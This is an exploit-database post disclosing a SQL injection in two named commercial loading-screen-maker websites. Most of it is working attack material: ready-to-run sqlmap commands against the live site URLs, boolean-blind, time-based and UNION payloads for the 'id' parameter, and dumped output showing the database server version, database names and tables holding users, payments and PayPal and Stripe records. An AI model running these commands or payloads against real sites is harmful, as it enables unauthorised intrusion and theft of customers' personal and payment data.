FiveM & Gmod Loading Screen Maker Free | SQL Injection Vulnerability

2021.12.11
tr 0x01369 (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: FiveM & Gmod Loading Screen Maker Free | SQL Injection Vulnerability # Author: Чингис хаан # Tested On: Kali Linux # sqlmap -u "https://www.fivem-lsm.com/help/category/index.php?id=1&s=7" --dbs --banner --batch # sqlmap -u "https://www.gmod-lsm.com/help/category/index.php?id=1&s=7" --dbs --banner --batch --------------------------------------------------------------------------------------------------- .com commercial FiveM Loading Screen Maker Free Gmod Loading Screen Maker Free https://www.fivem-lsm.com/help/category/index.php?id=1&s=7 https://www.gmod-lsm.com/help/category/index.php?id=1&s=7 --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 5974=5974 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 3621 FROM (SELECT(SLEEP(5)))sZGN) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x6f694177744f414c556e7678635144664177676c5964686b52686b42534165786745614b48435744,0x7178786a71),NULL,NULL-- - --- the back-end DBMS is MySQL web application technology: PHP 7.4.26, PHP, Nginx back-end DBMS operating system: Linux Ubuntu back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) banner: '10.1.48-MariaDB-0ubuntu0.18.04.1' available databases [2]: [+] fivem_db [+] gmod_db [+] information_schema Database: fivem_db gmod_db [24 tables] +----------------------+ | authcode | | blog | | designs | | fonts | | knowledge_articles | | knowledge_categories | | languages | | loadingscreens | | login_code | | music | | own_music | | payments | | paypal_log | | settings | | staff_cache | | statistics | | stripe_customer | | submit_languages | | subscriptions | | tags | | user_payments | | user_subscriptions | | users | | views | +----------------------+

References:

0x01369


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top